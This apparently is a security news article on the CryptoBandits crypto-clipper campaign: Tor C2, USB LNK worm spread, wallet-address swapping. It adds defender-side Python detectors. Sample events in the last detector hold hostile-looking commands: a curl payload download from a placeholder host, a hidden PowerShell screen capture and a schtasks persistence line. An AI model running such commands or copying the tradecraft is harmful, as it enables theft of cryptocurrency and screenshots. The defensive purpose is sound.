CryptoBandits Campaign Leverages Tor and Worm-like Propagation for Stealthy Crypto-Clipping
A Windows cryptocurrency clipper campaign tracked as **CryptoBandits** has been active since February 2026. The malware routes its command-and-control (C2) traffic over the **Tor** anonymity network and spreads itself through USB devices, pairing a financially motivated clipper with the evasion and persistence tradecraft more often seen in backdoors.
The **Microsoft Defender Security Research Team** has published details of the campaign. **CryptoBandits** combines clipboard-intercepting malware with worm-like propagation and relies on a **Tor** hidden service to conceal its C2 infrastructure.

### Evasive Tactics and Tor Integration
According to **Microsoft's** analysis, the **CryptoBandits** clipper does not rely on a traditional installer or on C2 servers reachable at exposed IP addresses. Instead, it bundles a portable **Tor** client and routes its traffic through a local **SOCKS5** proxy to a hidden-service C2, so the C2's address never appears on the wire; only ordinary Tor relay traffic does. Because that same channel can return code for the malware to execute, a financially motivated stealer effectively becomes a lightweight backdoor.
"The clipper in this campaign relies on **Windows Script Host** and **ActiveX**-driven logic to launch a bundled Tor proxy and poll a hidden-service C2 server," the **Microsoft Defender Security Research Team** stated. "It carries out high-frequency clipboard theft, screenshot exfiltration, and wallet-address substitution."
### How Clipper Malware Operates
Clipper malware functions by silently monitoring a user's clipboard for sensitive data. Its primary goal is to intercept cryptocurrency transactions by identifying and substituting legitimate wallet addresses with attacker-controlled ones, thereby rerouting funds.
### Infection and Propagation Mechanism
The initial infection vector for **CryptoBandits** involves distributing malicious **Windows Shortcut (LNK)** files via USB storage devices. When an unsuspecting user opens this shortcut, it triggers a worm component. This component first checks if the machine is already infected and, if not, proceeds to fetch the primary payload from a remote server.
To propagate, the worm component scans the USB device for common document types (e.g., DOC, XLSX, PDF), hides those legitimate files (setting the hidden attribute), and creates **LNK** shortcuts bearing the same names. Each shortcut carries arguments that invoke the worm component, so a user who opens what appears to be a harmless document executes the malware instead. Because Explorer hides the `.lnk` extension by default, the decoy is indistinguishable from the original at a glance unless hidden files are shown.
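The hide-and-replace pattern above leaves a recognisable artifact on the drive: a visible shortcut sitting next to a hidden document with the same name. The scanner below is an added example for incident responders, not Microsoft's tooling or the malware's code. It flags that pairing and, separately, any shortcut whose name ends in a document extension before `.lnk`. The extension list beyond DOC/XLSX/PDF and the treatment of both `Report.pdf.lnk` and `Report.lnk` as matches are assumptions; the hidden-attribute check only works on Windows, so the pure function takes a pre-computed listing.

```python
import os
from pathlib import Path
from typing import Iterable, List, Tuple

# Extensions the worm is said to target. The article names DOC, XLSX and PDF;
# the remaining entries are an assumption about other common document types.
DOC_EXTS = {".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".rtf", ".txt"}
FILE_ATTRIBUTE_HIDDEN = 0x2  # Win32 file attribute bit


def is_hidden(path: Path) -> bool:
    """True if the file carries the Windows hidden attribute (always False off Windows)."""
    attrs = getattr(path.stat(), "st_file_attributes", 0)
    return bool(attrs & FILE_ATTRIBUTE_HIDDEN)


def has_document_double_extension(name: str) -> bool:
    """True for names like 'Report.docx.lnk', which Explorer displays as 'Report.docx'."""
    stem, ext = os.path.splitext(name)
    if ext.lower() != ".lnk":
        return False
    return os.path.splitext(stem)[1].lower() in DOC_EXTS


def find_decoy_pairs(entries: Iterable[Tuple[str, bool]]) -> List[Tuple[str, str]]:
    """Pair each .lnk with a hidden document whose name it mimics.

    entries are (file name, hidden) tuples for one directory. A shortcut matches
    a hidden document if its name minus '.lnk' equals the document's full name
    ('Report.pdf.lnk' vs 'Report.pdf') or its stem ('Report.lnk' vs 'Report.pdf').
    Both forms are accepted because the article only says "identical names".
    """
    hidden_docs = {}
    shortcuts = []
    for name, hidden in entries:
        stem, ext = os.path.splitext(name)
        if ext.lower() == ".lnk":
            shortcuts.append((stem.lower(), name))
        elif hidden and ext.lower() in DOC_EXTS:
            hidden_docs.setdefault(name.lower(), []).append(name)
            hidden_docs.setdefault(stem.lower(), []).append(name)
    pairs = []
    for key, lnk in shortcuts:
        for doc in hidden_docs.get(key, []):
            pairs.append((lnk, doc))
    return pairs


def scan_directory(root: str) -> List[Tuple[str, str]]:
    """Walk a mounted drive and report decoy pairs directory by directory (Windows)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        entries = [(f, is_hidden(Path(dirpath) / f)) for f in files]
        findings.extend(
            (os.path.join(dirpath, lnk), os.path.join(dirpath, doc))
            for lnk, doc in find_decoy_pairs(entries)
        )
    return findings


# Constructed directory listing of an infected USB stick root (sample data).
SAMPLE_LISTING = [
    ("Budget.xlsx", True), ("Budget.xlsx.lnk", False),
    ("Report.pdf", True), ("Report.lnk", False),
    ("Notes.docx", False), ("Notes.docx.lnk", False),  # shortcut with no hidden twin
    ("Readme.txt", False),
]

if __name__ == "__main__":
    for lnk, doc in find_decoy_pairs(SAMPLE_LISTING):
        print(f"decoy shortcut {lnk!r} shadows hidden document {doc!r}")
    print("double-extension shortcuts:",
          [n for n, _ in SAMPLE_LISTING if has_document_double_extension(n)])
```

On a live system, `scan_directory("E:\\")` runs the same logic over a mounted stick; the pair check is deliberately stricter than the double-extension check, since a lone `Notes.docx.lnk` is suspicious but is not proof that a document was hidden behind it.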
### Persistence and Data Exfiltration
Beyond propagation, the worm component creates scheduled tasks to keep both itself and the stealer component running across reboots. The clipper module uses **WScript** and **ActiveXObject** for operating-system interaction and includes a simple evasion check: it exits if **Task Manager** appears among the running processes.

In its final stage, the malware launches a renamed **Tor** binary in a hidden window, generates a unique victim identifier, and registers it with the external C2 server. This establishes a continuous loop where the malware periodically polls the C2 for instructions and monitors the clipboard every 500 milliseconds for seed phrases and private keys.
"It also hijacks cryptocurrency addresses by replacing copied wallet values with attacker-controlled alternatives and uploads screenshots through Tor," **Microsoft** detailed. "If the C2 returns an **EVAL** response, the malware executes attacker-supplied code at runtime."
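The mechanics described under "How Clipper Malware Operates" and in the 500-millisecond polling loop above come down to one observable: a wallet address in the clipboard is replaced by a different address of the same type, shortly after the user copied it and without any further copy action. The code below is an added example of a defender-side check built on that observable; it is not Microsoft's detection logic or the malware's code. The set of address formats is an assumption (the article does not say which coins are targeted), the sample timeline is constructed, and the Bitcoin strings are the published BIP173 example addresses rather than real wallets.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Address formats a clipper typically matches before deciding to swap the
# clipboard. The coin set is an assumption of this example; the patterns
# themselves are the standard shapes of each address type.
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[ac-hj-np-z02-9]{11,71}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "xmr": re.compile(r"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$"),
}


def classify_address(text: str) -> Optional[str]:
    """Return the address type of a clipboard string, or None if it is not an address."""
    text = text.strip()
    for name, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return name
    return None


@dataclass
class ClipboardSnapshot:
    t_ms: int           # time the clipboard was read, in milliseconds
    text: str           # clipboard contents at that time
    user_copied: bool   # True if a user copy action was observed at this instant


def detect_substitutions(snapshots: List[ClipboardSnapshot],
                         window_ms: int = 2000) -> List[Tuple[str, str, str]]:
    """Flag a wallet address replaced by another of the same type with no copy action.

    A clipper polling every 500 ms rewrites the clipboard well inside
    `window_ms` of the user's copy, which is the timing this check keys on.
    Returns (original, replacement, address_type) tuples.
    """
    alerts = []
    prev: Optional[ClipboardSnapshot] = None
    for snap in sorted(snapshots, key=lambda s: s.t_ms):
        kind = classify_address(snap.text)
        if (
            prev is not None
            and kind is not None
            and classify_address(prev.text) == kind   # same coin, different address
            and snap.text != prev.text
            and not snap.user_copied                  # the user did not do this
            and snap.t_ms - prev.t_ms <= window_ms
        ):
            alerts.append((prev.text.strip(), snap.text.strip(), kind))
        prev = snap
    return alerts


# Constructed sample timeline. The Bitcoin strings are the BIP173 example
# addresses and the Ethereum strings are made up; none belong to a real
# victim or attacker.
SAMPLE_TIMELINE = [
    ClipboardSnapshot(0, "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq", True),    # user copies recipient
    ClipboardSnapshot(400, "bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4", False),  # rewritten, no copy
    ClipboardSnapshot(5000, "https://example.invalid/invoice", True),
    ClipboardSnapshot(5300, "0x1234567890abcdef1234567890abcdef12345678", True),
    ClipboardSnapshot(5700, "0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef", False),  # rewritten, no copy
    ClipboardSnapshot(9000, "0x1234567890abcdef1234567890abcdef12345678", True),   # user re-copies: legitimate
]

if __name__ == "__main__":
    for original, replacement, kind in detect_substitutions(SAMPLE_TIMELINE):
        print(f"[{kind}] {original} -> {replacement}")
```

The `user_copied` flag is what separates a clipper from a user who simply copies two addresses in a row; in a real monitor it would come from a clipboard-change event correlated with keyboard or menu input, and the 2-second window should be tuned to the polling rate you expect an implant to use.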
### Mitigating the Threat
**Microsoft** recommends that security defenders prioritize behavioral detections over static signatures. Specifically, organizations should look for **PowerShell**-based screen capture and the use of **WScript**, **CScript**, or related script engines for launching `curl`, `cmd.exe`, `PowerShell`, or unexpected executables.
Further mitigation strategies include:
* Disabling **AutoRun/AutoPlay** for all removable media.
* Blocking **LNK** execution from removable drives via **Group Policy Objects (GPOs)**, for example with AppLocker or Software Restriction Policy path rules.
* Restricting `wscript.exe` and `cscript.exe` where they are not needed; Windows Script Host can be disabled host-wide through its `Enabled` registry setting.
* Regularly reviewing clipboard-related and screen-capture behaviors on devices handling sensitive financial workflows.
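The behavioral detections Microsoft recommends above reduce to a few checks on process-creation telemetry: a script host (`wscript.exe`, `cscript.exe`) spawning `curl`, `cmd.exe`, `PowerShell` or a binary from an unexpected location, and PowerShell invoking screen-capture APIs. The code below is an added example of that logic run over constructed Sysmon-style events; it is not Microsoft's detection content. The inclusion of `mshta.exe` as a related script engine, the extra downloader children, the path heuristics for "unexpected" executables, and the use of `System.Drawing`/`CopyFromScreen` as the screen-capture marker are all assumptions of this example, as are the sample paths and command lines.

```python
import json
from typing import Dict, List, Tuple

# Script engines the article says to watch. mshta.exe is added here as a
# "related script engine" and is an assumption, not named in the article.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Children the article calls out, plus two common downloaders added as an assumption.
SUSPICIOUS_CHILDREN = {"curl.exe", "cmd.exe", "powershell.exe", "pwsh.exe",
                       "certutil.exe", "bitsadmin.exe"}
# The article says "PowerShell-based screen capture" without naming an API;
# System.Drawing's Graphics.CopyFromScreen is the usual one (assumption).
SCREEN_CAPTURE_MARKERS = ("copyfromscreen", "system.drawing", "system.windows.forms.screen")
# Locations from which a script host should not normally launch binaries (assumption).
UNEXPECTED_PATH_MARKERS = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate_event(event: Dict[str, str]) -> List[str]:
    """Return the detection names that fire for one process-creation event.

    `event` uses Sysmon Event ID 1 field names: Image, ParentImage, CommandLine.
    """
    image = event.get("Image", "")
    child = basename(image)
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "").lower()
    findings = []

    if parent in SCRIPT_HOSTS:
        if child in SUSPICIOUS_CHILDREN:
            findings.append("script_host_spawned_tool")
        # Anything launched from a user-writable path or a non-system drive
        # (removable media) counts as "unexpected"; assumes C: is the system drive.
        elif (any(m in image.lower() for m in UNEXPECTED_PATH_MARKERS)
              or not image.lower().startswith("c:\\")):
            findings.append("script_host_spawned_unexpected_exe")

    if child in ("powershell.exe", "pwsh.exe") and any(m in cmdline for m in SCREEN_CAPTURE_MARKERS):
        findings.append("powershell_screen_capture")

    return findings


def run_detections(jsonl: str) -> List[Tuple[str, List[str]]]:
    """Evaluate newline-delimited JSON events; return (Image, findings) for hits only."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        findings = evaluate_event(event)
        if findings:
            hits.append((event["Image"], findings))
    return hits


# Constructed sample events in Sysmon-like JSON. Paths and command lines are
# invented for this example and are not indicators from the campaign.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"curl.exe -s -o %TEMP%\x.dat http://example.invalid/p"},
    {"Image": r"D:\Documents\update.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"D:\Documents\update.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"Add-Type -AssemblyName System.Drawing; "
                    "$b=New-Object Drawing.Bitmap 1920,1080; "
                    "([Drawing.Graphics]::FromImage($b)).CopyFromScreen(0,0,0,0,$b.Size)\""},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "winword.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cmd.exe /c schtasks /create /tn Updater /tr C:\Users\Public\u.js /sc minute"},
])

if __name__ == "__main__":
    for image, findings in run_detections(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(findings)}")
```

Each rule is a parent/child relationship or a command-line substring rather than a hash, which is the point of preferring behavioral detection here: renaming the Tor binary or re-obfuscating the script changes nothing about `wscript.exe` launching `curl.exe`.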
These measures are crucial for protecting against sophisticated threats like **CryptoBandits** that leverage multiple vectors for stealth and persistence.